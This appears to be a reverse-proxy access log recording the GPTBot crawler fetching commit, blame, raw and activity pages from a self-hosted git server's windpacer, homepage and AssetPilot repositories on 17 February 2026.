[Length 10852] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10721] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:13:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:13:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/wiki" [Client 74.7.227.38] [Length 7371] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" -[17/Feb/2026:13:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=docker-compose.yml" [Client 74.7.227.38] [Length 19565] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" -[17/Feb/2026:13:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13173] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services" -[17/Feb/2026:13:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12942] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 74.7.227.38] [Length 156395] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" -[17/Feb/2026:13:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" [Client 74.7.227.38] [Length 10024] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" -[17/Feb/2026:13:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" -[17/Feb/2026:13:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13172] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services" -[17/Feb/2026:13:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13175] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services" -[17/Feb/2026:13:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/semiyearly" [Client 74.7.227.38] [Length 8618] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" -[17/Feb/2026:13:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/halfweekly" [Client 74.7.227.38] [Length 8371] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" -[17/Feb/2026:13:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" -[17/Feb/2026:13:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12971] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" -[17/Feb/2026:13:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 156431] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" -[17/Feb/2026:13:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 156438] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" -[17/Feb/2026:13:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 156438] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" -[17/Feb/2026:13:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 156428] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" -[17/Feb/2026:13:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 74.7.227.38] [Length 14435] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" -[17/Feb/2026:13:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 173143] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" -[17/Feb/2026:13:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12972] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12971] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:13:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 173148] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 173146] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 173141] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" -[17/Feb/2026:13:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" [Client 74.7.227.38] [Length 11104] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" -[17/Feb/2026:13:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" [Client 74.7.227.38] [Length 15975] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" -[17/Feb/2026:13:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" [Client 74.7.227.38] [Length 12609] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" -[17/Feb/2026:13:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 74.7.227.38] [Length 10546] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" -[17/Feb/2026:13:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 74.7.227.38] [Length 7513] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" -[17/Feb/2026:13:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" -[17/Feb/2026:13:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692349] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" -[17/Feb/2026:13:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71824] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15277] [Gzip 4.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:13:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/graph" [Client 74.7.227.38] [Length 10415] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11358] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:13:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" [Client 74.7.227.38] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" -[17/Feb/2026:13:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12447] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:13:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" [Client 74.7.227.38] [Length 16335] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:13:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 12752] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:13:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 10826] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:13:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16152] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:13:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 13423] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:13:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr 